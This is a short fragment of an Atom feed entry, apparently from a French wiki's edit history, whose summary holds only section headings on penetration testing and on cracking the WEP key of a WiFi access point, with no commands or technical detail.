&lt;div&gt;=== Tests D'intrusions ===&lt;br /&gt;
&lt;br /&gt;
=5.2 Cassage de clef WEP d’un point d’accès WiFi =&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	</feed>